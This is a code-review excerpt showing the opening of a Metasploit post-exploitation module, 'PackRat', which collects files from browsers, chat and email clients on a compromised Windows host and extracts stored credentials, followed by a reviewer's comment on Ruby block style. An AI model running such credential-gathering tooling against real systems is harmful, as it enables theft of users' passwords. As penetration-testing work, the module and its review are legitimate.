modules/post/windows/gather/credentials/packrat_credentials.rb

```diff
@@ -0,0 +1,273 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  # this associative array defines the artifacts known to PackRat
+  APPLICATION_ARRAY = JSON.parse(
+    File.read(File.join(Msf::Config.data_directory, 'packrat', 'artifacts.json')),
+    symbolize_names: true
+  )
+
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Windows Gather Application Artifacts (PackRat)',
+      'Description' => %q{PackRat gathers artifacts of various categories from a large number of applications.
+       Artifacts include: 12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.
+       Credentials are then extracted from the artifacts. The use case for this post-exploitation module is
+       to specify the types of
+       artifacts you are interested in, to gather the relevant files depending on your aims.
+       Please refer to the options for a full list of filter categories.},
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Daniel Hallsworth', # Leeds Beckett University student
+          'Barwar Salim M', # Leeds Beckett University student
+          'Z. Cliffe Schreuders' # Leeds Beckett University lecturer (http://z.cliffe.schreuders.org)
+        ],
+      'Platform' => %w{win},
+      'SessionTypes' => ['meterpreter']
+      ))
+
+    register_options(
+      [
+        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database (otherwise, only download)', 'true']),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('APPCATEGORY', [false, 'Category of applications to gather from', 'All', APPLICATION_ARRAY.map {|x| x[:category]}.uniq.unshift('All')]),
+        OptEnum.new('APPLICATION', [false, 'Specify application to gather from', 'All', APPLICATION_ARRAY.map {|x| x[:application]}.uniq.unshift('All')]),
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', APPLICATION_ARRAY.map {|x| x[:filetypes]}.uniq.unshift('All')]),
+      ])
+  end
+
+  def run
+    print_status("Filtering based on these selections:  ")
+    print_status("APPCATEGORY: #{datastore['APPCATEGORY'].capitalize}, APPLICATION: #{datastore['APPLICATION'].capitalize}, ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
+
+    #used to grab files for each user on the remote host.
+    grab_user_profiles.each do |userprofile|
+      APPLICATION_ARRAY.each {|app_loop|
```

Comment:
As an example of what I mean, you are using `do` for the outside block but `{` for the inside block, and both blocks are multiline. Please use `do` as per https://github.com/rubocop-hq/ruby-style-guide#single-line-blocks.

I don't care so much about what the "right" style is so long as your code is consistent and clean.